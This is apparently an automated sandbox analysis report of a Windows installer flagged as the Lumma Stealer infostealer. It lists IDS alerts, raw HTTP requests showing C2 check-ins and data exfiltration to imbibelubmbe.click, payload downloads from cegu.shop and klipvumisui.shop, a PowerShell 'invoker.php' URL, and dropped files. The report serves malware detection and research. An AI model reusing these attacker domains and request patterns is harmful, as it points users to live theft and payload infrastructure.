Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49738 -> 104.21.42.198:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 104.21.42.198:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49742 -> 104.21.42.198:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49737 -> 104.21.42.198:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.42.198:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 104.21.42.198:443

Source: Joe Sandbox View

IP Address: 185.161.251.21 185.161.251.21

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.42.198:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.42.198:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.42.198:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.42.198:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.42.198:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 185.161.251.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 104.21.42.198:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49758 -> 172.67.208.58:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.42.198:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.42.198:443
Source: Network traffic	Suricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 172.67.208.58:443 -> 192.168.2.4:49758

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: imbibelubmbe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: imbibelubmbe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VR3C7XZNNPUQ5WFUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18152Host: imbibelubmbe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=S5QCTGYBAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8731Host: imbibelubmbe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RQUDS4ZVEU28UFUHH0UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20444Host: imbibelubmbe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2SQS9UJZD3PUSOY3WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1241Host: imbibelubmbe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OVZ3LKRZD3AZ8S17L6RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1131Host: imbibelubmbe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 115Host: imbibelubmbe.click
Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
Source: global traffic	HTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
Source: global traffic	HTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop

Source: global traffic	DNS traffic detected: DNS query: lvtyqJYzLeYzcx.lvtyqJYzLeYzcx
Source: global traffic	DNS traffic detected: DNS query: imbibelubmbe.click
Source: global traffic	DNS traffic detected: DNS query: cegu.shop
Source: global traffic	DNS traffic detected: DNS query: klipvumisui.shop
Source: global traffic	DNS traffic detected: DNS query: dfgh.online

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: imbibelubmbe.click

Source: installer_1.05_36.5.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: installer_1.05_36.5.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: installer_1.05_36.5.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: installer_1.05_36.5.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: Pens.com.1.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Pens.com.1.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Pens.com.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Pens.com.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Pens.com.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: powershell.exe, 00000011.00000002.2322740264.0000000007788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: powershell.exe, 00000011.00000002.2322740264.0000000007788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000011.00000002.2322740264.0000000007788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ms/Mi
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.usertr
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.usertru
Source: installer_1.05_36.5.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: installer_1.05_36.5.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: installer_1.05_36.5.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: installer_1.05_36.5.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: installer_1.05_36.5.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/Sectig
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cscasha2.ocsp-certum.com04
Source: BrightLib.exe, 00000032.00000002.2908056353.0000000000AEE000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://michaeluno.jp/
Source: installer_1.05_36.5.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000011.00000002.2321223484.0000000006023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: installer_1.05_36.5.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: installer_1.05_36.5.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: installer_1.05_36.5.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: installer_1.05_36.5.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: Pens.com.1.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: Pens.com.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Pens.com.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Pens.com.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000011.00000002.2317088393.0000000005117000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://repository.certum.pl/cscasha2.cer0
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: powershell.exe, 00000011.00000002.2317088393.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Pens.com.1.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Pens.com.1.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://subca.ocsp-certum.com01
Source: powershell.exe, 00000011.00000002.2317088393.0000000005117000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: BrightLib.exe, 00000032.00000002.2907992424.000000000049A000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.autohotkey.com
Source: BrightLib.exe, 00000032.00000002.2907992424.000000000049A000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.autohotkey.comCould
Source: Pens.com, 0000000C.00000000.1699393380.0000000000155000.00000002.00000001.01000000.00000008.sdmp, Pens.com.1.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.certum.pl/CPS0
Source: installer_1.05_36.5.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000011.00000002.2322740264.0000000007788000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.0
Source: powershell.exe, 00000011.00000002.2322404249.0000000007704000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://...onlin
Source: powershell.exe, 00000011.00000002.2317088393.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000011.00000002.2321223484.0000000006023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.2321223484.0000000006023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.2321223484.0000000006023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000011.00000002.2317088393.0000000005117000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online
Source: powershell.exe, 00000011.00000002.2315065218.00000000033B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=
Source: powershell.exe, 00000011.00000002.2322634468.0000000007764000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2317088393.0000000005117000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=user-PC
Source: powershell.exe, 00000011.00000002.2317088393.0000000005117000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=user-PCT
Source: powershell.exe, 00000011.00000002.2313277505.0000000002E90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compname=
Source: powershell.exe, 00000011.00000002.2317088393.0000000005117000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000011.00000002.2317088393.000000000540E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://jrsoftware.org/
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe, 00000013.00000000.2472535335.0000000000FC1000.00000020.00000001.01000000.0000000B.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe.12.dr	String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://jrsoftware.org0
Source: powershell.exe, 00000011.00000002.2321223484.0000000006023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: Pens.com.1.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.certum.pl/CPS0
Source: Pens.com.1.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe, 00000013.00000003.2476565736.00000000037BF000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe, 00000013.00000003.2479943913.000000007EE5B000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000000.2489704382.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000000.2506368123.000000000069D000.00000020.00000001.01000000.0000000E.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp.22.dr, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp.19.dr	String found in binary or memory: https://www.innosetup.com/
Source: E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe, 00000013.00000003.2476565736.00000000037BF000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe, 00000013.00000003.2479943913.000000007EE5B000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000000.2489704382.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000000.2506368123.000000000069D000.00000020.00000001.01000000.0000000E.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp.22.dr, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp.19.dr	String found in binary or memory: https://www.remobjects.com/ps

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 104.21.42.198:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.198:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.198:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.198:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.198:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.198:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.198:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.198:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.4:49758 version: TLS 1.2

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe

Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050CD

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe

Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044A5

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe

Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,

0_2_00403883

Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	File created: C:\Windows\ControllersAqua	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	File created: C:\Windows\DesignersExactly	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	File created: C:\Windows\BathsStaffing	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	File created: C:\Windows\RelianceDistributions	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	File created: C:\Windows\CounselJack	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_36.5.exe	File created: C:\Windows\RacesAerial	Jump to behavior
